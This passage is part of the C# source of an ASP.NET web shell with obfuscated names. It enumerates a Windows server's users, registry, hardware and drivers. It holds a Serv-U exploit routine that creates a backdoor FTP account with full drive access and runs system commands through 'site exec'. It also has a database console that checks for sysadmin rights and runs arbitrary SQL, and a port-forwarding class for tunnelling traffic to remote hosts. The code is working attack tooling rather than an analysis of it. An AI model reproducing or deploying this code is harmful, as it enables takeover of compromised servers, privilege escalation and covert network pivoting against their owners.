  965. if(i==6)
  966. {
  967. td.Text=dt.Rows[j]["StartMode"].ToString();
  968. tr.Controls.Add(td);
  969. }
  970. }
  971. vHCs.Controls.Add(tr);
  972. }
  973. }
  974. catch(Exception error)
  975. {
  976. oHpF();
  977. }
  978. }
  979. public void PLd()
  980. {
  981. try
  982. {
  983. WICxe();
  984. xWVQ.Visible=true;
  985. Bin_H2_Title.InnerText="User Information >>";
  986. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
  987. foreach(DirectoryEntry child in TWQ.Children)
  988. {
  989. foreach(string name in child.Properties.PropertyNames)
  990. {
  991. PropertyValueCollection pvc=child.Properties[name];
  992. int c=pvc.Count;
  993. for(int i=0;i<c;i++)
  994. {
  995. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
  996. {
  997. string bg=OKM();
  998. TableRow tr=new TableRow();
  999. tr.Attributes["onmouseover"]="this.className='focus';";
  1000. tr.CssClass=bg;
  1001. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1002. TableCell td=new TableCell();
  1003. td.Text=name;
  1004. tr.Controls.Add(td);
  1005. TableCell td1=new TableCell();
  1006. td1.Text=pvc[i].ToString();
  1007. tr.Controls.Add(td1);
  1008. VPa.Controls.Add(tr);
  1009. }
  1010. }
  1011. }
  1012. TableRow trn=new TableRow();
  1013. for(int x=1;x<3;x++)
  1014. {
  1015. TableCell tdn=new TableCell();
  1016. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1017. trn.Controls.Add(tdn);
  1018. VPa.Controls.Add(trn);
  1019. }
  1020. }
  1021. }
  1022. catch(Exception error)
  1023. {
  1024. xseuB(error.Message);
  1025. }
  1026. }
  1027. public void iLVUT()
  1028. {
  1029. try
  1030. {
  1031. WICxe();
  1032. xWVQ.Visible=true;
  1033. Bin_H2_Title.InnerText="User Information >>";
  1034. DataTable user=cCf("Win32_UserAccount");
  1035. for(int i=0;i<user.Rows.Count;i++)
  1036. {
  1037. for(int j=0;j<user.Columns.Count;j++)
  1038. {
  1039. string bg=OKM();
  1040. TableRow tr=new TableRow();
  1041. tr.Attributes["onmouseover"]="this.className='focus';";
  1042. tr.CssClass=bg;
  1043. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1044. TableCell td=new TableCell();
  1045. td.Text=user.Columns[j].ToString();
  1046. tr.Controls.Add(td);
  1047. TableCell td1=new TableCell();
  1048. td1.Text=user.Rows[i][j].ToString();
  1049. tr.Controls.Add(td1);
  1050. VPa.Controls.Add(tr);
  1051. }
  1052. TableRow trn=new TableRow();
  1053. for(int x=1;x<3;x++)
  1054. {
  1055. TableCell tdn=new TableCell();
  1056. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1057. trn.Controls.Add(tdn);
  1058. VPa.Controls.Add(trn);
  1059. }
  1060. }
  1061. }
  1062. catch(Exception error)
  1063. {
  1064. PLd();
  1065. }
  1066. }
  1067. public void pDVM()
  1068. {
  1069. try
  1070. {
  1071. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
  1072. string IKjwH=DdmPl(EeZ,"PortNumber");
  1073. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
  1074. int cpu=izN.SubKeyCount;
  1075. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
  1076. string NPPZ=DdmPl(mQII,"ProcessorNameString");
  1077. WICxe();
  1078. ghaB.Visible=true;
  1079. Bin_H2_Title.InnerText="System Information >>";
  1080. Bin_H2_Mac.InnerText="MAC Information >>";
  1081. Bin_H2_Driver.InnerText="Driver Information >>";
  1082. StringBuilder yEwc=new StringBuilder();
  1083. StringBuilder hwJeS=new StringBuilder();
  1084. StringBuilder jXkaE=new StringBuilder();
  1085. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
  1086. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
  1087. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
  1088. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
  1089. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
  1090. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
  1091. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
  1092. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
  1093. DataTable BIOS=cCf("Win32_BIOS");
  1094. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
  1095. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
  1096. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
  1097. DataTable upM=cCf("Win32_PhysicalMemory");
  1098. Int64 oZnZV=0;
  1099. for(int i=0;i<upM.Rows.Count;i++)
  1100. {
  1101. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
  1102. }
  1103. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
  1104. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
  1105. for(int i=0;i<dOza.Rows.Count;i++)
  1106. {
  1107. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
  1108. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
  1109. {
  1110. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
  1111. }
  1112. }
  1113. DataTable Driver=cCf("Win32_SystemDriver");
  1114. for (int i=0; i<Driver.Rows.Count; i++)
  1115. {
  1116. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
  1117. if (Driver.Rows[i]["PathName"]!=string.Empty)
  1118. {
  1119. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
  1120. }
  1121. else
  1122. {
  1123. jXkaE.Append("No path information");
  1124. }
  1125. jXkaE.Append("</li>");
  1126. }
  1127. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
  1128. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
  1129. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
  1130. }
  1131. catch(Exception error)
  1132. {
  1133. xseuB(error.Message);
  1134. }
  1135. }
  1136. public void ADCpk()
  1137. {
  1138. WICxe();
  1139. APl.Visible=true;
  1140. Bin_H2_Title.InnerText="Serv-U Exec >>";
  1141. }
  1142. public void lDODR()
  1143. {
  1144. string JGGg=string.Empty;
  1145. string user=dNohJ.Value;
  1146. string pass=NMd.Value;
  1147. int port=Int32.Parse(HlQl.Value);
  1148. string cmd=mHbjB.Value;
  1149. string CRtK="user "+user+"\r\n";
  1150. string jnNG="pass "+pass+"\r\n";
  1151. string site="SITE MAINTENANCE\r\n";
  1152. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
  1153. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
  1154. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
  1155. string zexn="QUIT\r\n";
  1156. UHlA.Visible=true;
  1157. try
  1158. {
  1159. tcp.Connect("127.0.0.1",port);
  1160. tcp.ReceiveBufferSize=1024;
  1161. NS=tcp.GetStream();
  1162. Rev(NS);
  1163. ZJiM(NS,CRtK);
  1164. Rev(NS);
  1165. ZJiM(NS,jnNG);
  1166. Rev(NS);
  1167. ZJiM(NS,site);
  1168. Rev(NS);
  1169. ZJiM(NS,mtoJb);
  1170. Rev(NS);
  1171. ZJiM(NS,sutI);
  1172. Rev(NS);
  1173. ZJiM(NS,iVDT);
  1174. Rev(NS);
  1175. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
  1176. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
  1177. NS1=zvxm.GetStream();
  1178. Rev(NS1);
  1179. ZJiM(NS1,"user bin\r\n");
  1180. Rev(NS1);
  1181. ZJiM(NS1,"pass binftp\r\n");
  1182. Rev(NS1);
  1183. ZJiM(NS1,"site exec "+cmd+"\r\n");
  1184. Rev(NS1);
  1185. ZJiM(NS1,"quit\r\n");
  1186. Rev(NS1);
  1187. zvxm.Close();
  1188. ZJiM(NS,mtoJb);
  1189. Rev(NS);
  1190. tcp.Close();
  1191. }
  1192. catch(Exception error)
  1193. {
  1194. xseuB(error.Message);
  1195. }
  1196. }
  1197. protected void Rev(NetworkStream instream)
  1198. {
  1199. string FTBtf=string.Empty;
  1200. if(instream.CanRead)
  1201. {
  1202. byte[] uPZ=new byte[1024];
  1203. do
  1204. {
  1205. System.Threading.Thread.Sleep(50);
  1206. int len=instream.Read(uPZ,0,uPZ.Length);
  1207. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
  1208. }
  1209. while(instream.DataAvailable);
  1210. }
  1211. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
  1212. }
  1213. protected void ZJiM(NetworkStream instream,string Sendstr)
  1214. {
  1215. if(instream.CanWrite)
  1216. {
  1217. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
  1218. instream.Write(uPZ,0,uPZ.Length);
  1219. }
  1220. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
  1221. }
  1222. public void xFhz()
  1223. {
  1224. WICxe();
  1225. kkHN.Visible=true;
  1226. Bin_H2_Title.InnerText="RegShell >>";
  1227. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1228. vyX.Text="";
  1229. foreach(string rootkey in txc.Split('|'))
  1230. {
  1231. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
  1232. }
  1233. lFAvw();
  1234. }
  1235. protected void lFAvw()
  1236. {
  1237. qPdI.Text="";
  1238. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1239. TableRow tr;
  1240. TableCell tc;
  1241. foreach(string rootkey in txc.Split('|'))
  1242. {
  1243. tr=new TableRow();
  1244. tc=new TableCell();
  1245. string bg=OKM();
  1246. tr.Attributes["onmouseover"]="this.className='focus';";
  1247. tr.CssClass=bg;
  1248. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1249. tc.Width=Unit.Parse("40%");
  1250. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
  1251. tr.Cells.Add(tc);
  1252. tc=new TableCell();
  1253. tc.Width=Unit.Parse("60%");
  1254. tc.Text="&lt;RootKey&gt;";
  1255. tr.Cells.Add(tc);
  1256. pLWD.Rows.Add(tr);
  1257. }
  1258. }
  1259. protected void tpRQ(string Reg_Path)
  1260. {
  1261. if(!Reg_Path.EndsWith("\\"))
  1262. {
  1263. Reg_Path=Reg_Path+"\\";
  1264. }
  1265. qPdI.Text=Reg_Path;
  1266. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
  1267. cJG=Regex.Replace(cJG,@"\\+","\\");
  1268. TableRow tr=new TableRow();
  1269. TableCell tc=new TableCell();
  1270. string bg=OKM();
  1271. tr.Attributes["onmouseover"]="this.className='focus';";
  1272. tr.CssClass=bg;
  1273. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1274. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
  1275. tc.Attributes["colspan"]="2" ;
  1276. tr.Cells.Add(tc);
  1277. pLWD.Rows.Add(tr);
  1278. try
  1279. {
  1280. string subpath;
  1281. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
  1282. RegistryKey rk=null;
  1283. RegistryKey sk;
  1284. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
  1285. {
  1286. rk=Registry.LocalMachine;
  1287. }
  1288. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
  1289. {
  1290. rk=Registry.ClassesRoot;
  1291. }
  1292. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
  1293. {
  1294. rk=Registry.CurrentUser;
  1295. }
  1296. else if(Reg_Path.StartsWith("HKEY_USERS"))
  1297. {
  1298. rk=Registry.Users;
  1299. }
  1300. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
  1301. {
  1302. rk=Registry.CurrentConfig;
  1303. }
  1304. if(kDgkX.Length>1)
  1305. {
  1306. sk=rk.OpenSubKey(kDgkX);
  1307. }
  1308. else
  1309. {
  1310. sk=rk;
  1311. }
  1312. foreach(string innerSubKey in sk.GetSubKeyNames())
  1313. {
  1314. tr=new TableRow();
  1315. tc=new TableCell();
  1316. bg=OKM();
  1317. tr.Attributes["onmouseover"]="this.className='focus';";
  1318. tr.CssClass=bg;
  1319. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1320. tc.Width=Unit.Parse("40%");
  1321. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
  1322. tr.Cells.Add(tc);
  1323. tc=new TableCell();
  1324. tc.Width=Unit.Parse("60%");
  1325. tc.Text="&lt;SubKey&gt;";
  1326. tr.Cells.Add(tc);
  1327. pLWD.Rows.Add(tr);
  1328. }
  1329. TableRow cKVA=new TableRow();
  1330. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  1331. cKVA.Attributes["bgcolor"]="#dddddd";
  1332. TableCell JlmW=new TableCell();
  1333. JlmW.Attributes["colspan"]="2" ;
  1334. JlmW.Attributes["height"]="5";
  1335. cKVA.Cells.Add(JlmW);
  1336. pLWD.Rows.Add(cKVA);
  1337. foreach(string strValueName in sk.GetValueNames())
  1338. {
  1339. tr=new TableRow();
  1340. tc=new TableCell();
  1341. bg=OKM();
  1342. tr.Attributes["onmouseover"]="this.className='focus';";
  1343. tr.CssClass=bg;
  1344. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1345. tc.Width=Unit.Parse("40%");
  1346. tc.Text=strValueName;
  1347. tr.Cells.Add(tc);
  1348. tc=new TableCell();
  1349. tc.Width=Unit.Parse("60%");
  1350. tc.Text=DdmPl(sk,strValueName);
  1351. tr.Cells.Add(tc);
  1352. pLWD.Rows.Add(tr);
  1353. }
  1354. }
  1355. catch(Exception error)
  1356. {
  1357. xseuB(error.Message);
  1358. }
  1359. }
  1360. public string DdmPl(RegistryKey sk,string strValueName)
  1361. {
  1362. object uPZ;
  1363. string RaTGr="";
  1364. try
  1365. {
  1366. uPZ=sk.GetValue(strValueName,"NULL");
  1367. if(uPZ.GetType()==typeof(byte[]))
  1368. {
  1369. foreach(byte tmpbyte in(byte[])uPZ)
  1370. {
  1371. if((int)tmpbyte<16)
  1372. {
  1373. RaTGr+="0";
  1374. }
  1375. RaTGr+=tmpbyte.ToString("X");
  1376. }
  1377. }
  1378. else if(uPZ.GetType()==typeof(string[]))
  1379. {
  1380. foreach(string tmpstr in(string[])uPZ)
  1381. {
  1382. RaTGr+=tmpstr;
  1383. }
  1384. }
  1385. else
  1386. {
  1387. RaTGr=uPZ.ToString();
  1388. }
  1389. }
  1390. catch(Exception error)
  1391. {
  1392. xseuB(error.Message);
  1393. }
  1394. return RaTGr;
  1395. }
  1396. public void vNCHZ()
  1397. {
  1398. WICxe();
  1399. YwLB.Visible=true;
  1400. Bin_H2_Title.InnerText="PortScan >>";
  1401. }
  1402. public void rAhe()
  1403. {
  1404. WICxe();
  1405. iDgmL.Visible=true;
  1406. dQIIF.Visible=false;
  1407. Bin_H2_Title.InnerText="DataBase >>";
  1408. }
  1409. protected void OUj()
  1410. {
  1411. if(Dtdr.State==ConnectionState.Closed)
  1412. {
  1413. try
  1414. {
  1415. Dtdr.ConnectionString=MasR.Text;
  1416. Kkvb.Connection=Dtdr;
  1417. Dtdr.Open();
  1418. }
  1419. catch(Exception Error)
  1420. {
  1421. xseuB(Error.Message);
  1422. }
  1423. }
  1424. }
  1425. protected void fUzE()
  1426. {
  1427. if(Dtdr.State==ConnectionState.Open)
  1428. Dtdr.Close();
  1429. Dtdr.Dispose();
  1430. Kkvb.Dispose();
  1431. }
  1432. public DataTable CYUe(string sqlstr)
  1433. {
  1434. OleDbDataAdapter da=new OleDbDataAdapter();
  1435. DataTable Dstog=new DataTable();
  1436. try
  1437. {
  1438. OUj();
  1439. Kkvb.CommandType=CommandType.Text;
  1440. Kkvb.CommandText=sqlstr;
  1441. da.SelectCommand=Kkvb;
  1442. da.Fill(Dstog);
  1443. }
  1444. catch(Exception)
  1445. {
  1446. }
  1447. finally
  1448. {
  1449. fUzE();
  1450. }
  1451. return Dstog;
  1452. }
  1453. public DataTable[] Bin_Data(string query)
  1454. {
  1455. ArrayList list=new ArrayList();
  1456. try
  1457. {
  1458. string str;
  1459. OUj();
  1460. query=query+"\r\n";
  1461. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
  1462. int EmRX=0;
  1463. for(int i=0;i<gcod.Count;i++)
  1464. {
  1465. Match FJD=gcod[i];
  1466. str=query.Substring(EmRX,FJD.Index-EmRX);
  1467. if(str.Trim().Length>0)
  1468. {
  1469. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
  1470. Kkvb.CommandType=CommandType.Text;
  1471. Kkvb.CommandText=str.Trim();
  1472. FgzeQ.SelectCommand=Kkvb;
  1473. DataSet cDPp=new DataSet();
  1474. FgzeQ.Fill(cDPp);
  1475. for(int j=0;j<cDPp.Tables.Count;j++)
  1476. {
  1477. list.Add(cDPp.Tables[j]);
  1478. }
  1479. }
  1480. EmRX=FJD.Index+3;
  1481. }
  1482. str=query.Substring(EmRX,query.Length-EmRX);
  1483. if(str.Trim().Length>0)
  1484. {
  1485. OleDbDataAdapter VwB=new OleDbDataAdapter();
  1486. Kkvb.CommandType=CommandType.Text;
  1487. Kkvb.CommandText=str.Trim();
  1488. VwB.SelectCommand=Kkvb;
  1489. DataSet arG=new DataSet();
  1490. VwB.Fill(arG);
  1491. for(int k=0;k<arG.Tables.Count;k++)
  1492. {
  1493. list.Add(arG.Tables[k]);
  1494. }
  1495. }
  1496. }
  1497. catch(SqlException e)
  1498. {
  1499. xseuB(e.Message);
  1500. rom.Visible=false;
  1501. }
  1502. return(DataTable[])list.ToArray(typeof(DataTable));
  1503. }
  1504. public void JIAKU(string instr)
  1505. {
  1506. try
  1507. {
  1508. OUj();
  1509. Kkvb.CommandType=CommandType.Text;
  1510. Kkvb.CommandText=instr;
  1511. Kkvb.ExecuteNonQuery();
  1512. }
  1513. catch(Exception e)
  1514. {
  1515. xseuB(e.Message);
  1516. }
  1517. }
  1518. public void dwgT()
  1519. {
  1520. try
  1521. {
  1522. OUj();
  1523. if(WYmo.SelectedItem.Text=="MSSQL")
  1524. {
  1525. if(Pvf.SelectedItem.Value!="")
  1526. {
  1527. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
  1528. }
  1529. }
  1530. DataTable[] jxF=null;
  1531. jxF=Bin_Data(jHIy.InnerText);
  1532. if(jxF!=null && jxF.Length>0)
  1533. {
  1534. for(int j=0;j<jxF.Length;j++)
  1535. {
  1536. rom.PreRender+=new EventHandler(lRavM);
  1537. rom.DataSource=jxF[j];
  1538. rom.DataBind();
  1539. for(int i=0;i<rom.Items.Count;i++)
  1540. {
  1541. string bg=OKM();
  1542. rom.Items[i].CssClass=bg;
  1543. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1544. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1545. }
  1546. }
  1547. }
  1548. else
  1549. {
  1550. rom.DataSource=null;
  1551. rom.DataBind();
  1552. }
  1553. rom.Visible=true;
  1554. }
  1555. catch(Exception e)
  1556. {
  1557. xseuB(e.Message);
  1558. rom.Visible=false;
  1559. }
  1560. }
  1561. public void xTZY()
  1562. {
  1563. try
  1564. {
  1565. if(WYmo.SelectedItem.Text=="MSSQL")
  1566. {
  1567. if(Pvf.SelectedItem.Value=="")
  1568. {
  1569. rom.DataSource=null;
  1570. rom.DataBind();
  1571. return;
  1572. }
  1573. }
  1574. OUj();
  1575. DataTable zKvOw=new DataTable();
  1576. DataTable jxF=new DataTable();
  1577. DataTable baVJV=new DataTable();
  1578. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
  1579. {
  1580. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
  1581. }
  1582. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
  1583. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
  1584. foreach(DataRow dr in zKvOw.Rows)
  1585. {
  1586. jxF.ImportRow(dr);
  1587. }
  1588. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
  1589. rom.PreRender+=new EventHandler(lRavM);
  1590. rom.DataSource=jxF;
  1591. rom.DataBind();
  1592. for(int i=0;i<rom.Items.Count;i++)
  1593. {
  1594. string bg=OKM();
  1595. rom.Items[i].CssClass=bg;
  1596. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1597. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1598. }
  1599. rom.Visible=true;
  1600. }
  1601. catch(Exception e)
  1602. {
  1603. xseuB(e.Message);
  1604. rom.Visible=false;
  1605. }
  1606. }
  1607. private void lRavM(object sender,EventArgs e)
  1608. {
  1609. DataGrid d=(DataGrid)sender;
  1610. foreach(DataGridItem item in d.Items)
  1611. {
  1612. foreach(TableCell t in item.Cells)
  1613. {
  1614. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
  1615. }
  1616. }
  1617. }
  1618. public void vCf()
  1619. {
  1620. dQIIF.Visible=true;
  1621. try
  1622. {
  1623. jHIy.InnerHtml=string.Empty;
  1624. if(WYmo.SelectedItem.Text=="MSSQL")
  1625. {
  1626. rom.Visible=false;
  1627. uXevN.Visible=true;
  1628. irTU.Visible=true;
  1629. OUj();
  1630. DataTable ver=CYUe(@"SELECT @@VERSION");
  1631. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
  1632. DataTable cdb=CYUe(@"SELECT DB_NAME()");
  1633. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
  1634. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
  1635. string jHlh=ver.Rows[0][0].ToString();
  1636. string dbo=string.Empty;
  1637. if(YKrm.Rows[0][0].ToString()=="1")
  1638. {
  1639. dbo="db_owner";
  1640. }
  1641. else
  1642. {
  1643. dbo="public";
  1644. }
  1645. if(rol.Rows[0][0].ToString()=="1")
  1646. {
  1647. dbo="<font color=blue>sa</font>";
  1648. }
  1649. string db_name=string.Empty;
  1650. foreach(ListItem item in FGEy.Items)
  1651. {
  1652.  if(item.Selected=true)
  1653.  {
  1654.  item.Selected=false;
  1655.  }
  1656. }
  1657. Pvf.Items.Clear();
  1658. Pvf.Items.Add("-- Select a DataBase --");
  1659. Pvf.Items[0].Value="";
  1660. for(int i=0;i<dbs.Rows.Count;i++)
  1661. {
  1662. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
  1663. Pvf.Items.Add(dbs.Rows[i][0].ToString());
  1664. }
  1665. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
  1666. }
  1667. else
  1668. {
  1669. uXevN.Visible=false;
  1670. irTU.Visible=false;
  1671. xTZY();
  1672. }
  1673. }
  1674. catch(Exception e)
  1675. {
  1676. dQIIF.Visible=false;
  1677. }
  1678. }
  1679. public void MHLv()
  1680. {
  1681. WICxe();
  1682. hOWTm.Visible=true;
  1683. Bin_H2_Title.InnerText="PortMap >>";
  1684. }
  1685. public class PortForward
  1686. {
  1687. public string Localaddress;
  1688. public int LocalPort;
  1689. public string RemoteAddress;
  1690. public int RemotePort;
  1691. string type;
  1692. Socket ltcpClient;
  1693. Socket rtcpClient;
  1694. Socket server;
  1695. byte[] DPrPL=new byte[2048];
  1696. byte[] wvZv=new byte[2048];
  1697. public struct session
  1698. {
  1699. public Socket rdel;
  1700. public Socket ldel;
  1701. public int llen;
  1702. public int rlen;
  1703. }
  1704. public static IPEndPoint mtJ(string host,int port)
  1705. {
  1706. IPEndPoint iep=null;
  1707. IPHostEntry aGN=Dns.Resolve(host);
  1708. IPAddress rmt=aGN.AddressList[0];
  1709. iep=new IPEndPoint(rmt,port);
  1710. return iep;
  1711. }
  1712. public void Start(string Rip,int Rport,string lip,int lport)
  1713. {
  1714. try
  1715. {
  1716. LocalPort=lport;
  1717. RemoteAddress=Rip;
  1718. RemotePort=Rport;
  1719. Localaddress=lip;
  1720. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1721. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1722. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
  1723. }
  1724. catch (Exception ex) { }
  1725. }
  1726. protected void iiGFO(IAsyncResult ar)
  1727. {
  1728. try
  1729. {
  1730. session RKXy=new session();
  1731. RKXy.ldel=ltcpClient;
  1732. RKXy.rdel=rtcpClient;
  1733. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
  1734. }
  1735. catch (Exception ex) { }
  1736. }
  1737. protected void VTp(IAsyncResult ar)
  1738. {
  1739. try
  1740. {
  1741. session RKXy=(session)ar.AsyncState;
  1742. ltcpClient.EndConnect(ar);
  1743. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
  1744. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
  1745. }
  1746. catch (Exception ex) { }
  1747. }
  1748. private void LFYM(IAsyncResult ar)
  1749. {
  1750. try
  1751. {
  1752. session RKXy=(session)ar.AsyncState;
  1753. int Ret=RKXy.rdel.EndReceive(ar);
  1754. if (Ret>0)
  1755. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
  1756. else lyTOK();
  1757. }
  1758. catch (Exception ex) { }
  1759. }
  1760. private void JTcp(IAsyncResult ar)
  1761. {
  1762. try
  1763. {
  1764. session RKXy=(session)ar.AsyncState;
  1765. RKXy.ldel.EndSend(ar);
  1766. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
  1767. }
  1768. catch (Exception ex) { }
  1769. }
  1770. private void xPS(IAsyncResult ar)
  1771. {
  1772. try
  1773. {
  1774. session RKXy=(session)ar.AsyncState;
  1775. int Ret=RKXy.ldel.EndReceive(ar);
  1776. if (Ret>0)
  1777. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
  1778. else lyTOK();
  1779. }
  1780. catch (Exception ex) { }
  1781. }
  1782. private void IZU(IAsyncResult ar)
  1783. {
  1784. try
  1785. {
  1786. session RKXy=(session)ar.AsyncState;
  1787. RKXy.rdel.EndSend(ar);
  1788. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
  1789. }
  1790. catch (Exception ex) { }
  1791. }
  1792. public void lyTOK()
  1793. {
  1794. try
  1795. {
  1796. if (ltcpClient!=null)
  1797. {
  1798. ltcpClient.Close();
  1799. }
  1800. if (rtcpClient!=null)
  1801. rtcpClient.Close();
  1802. }
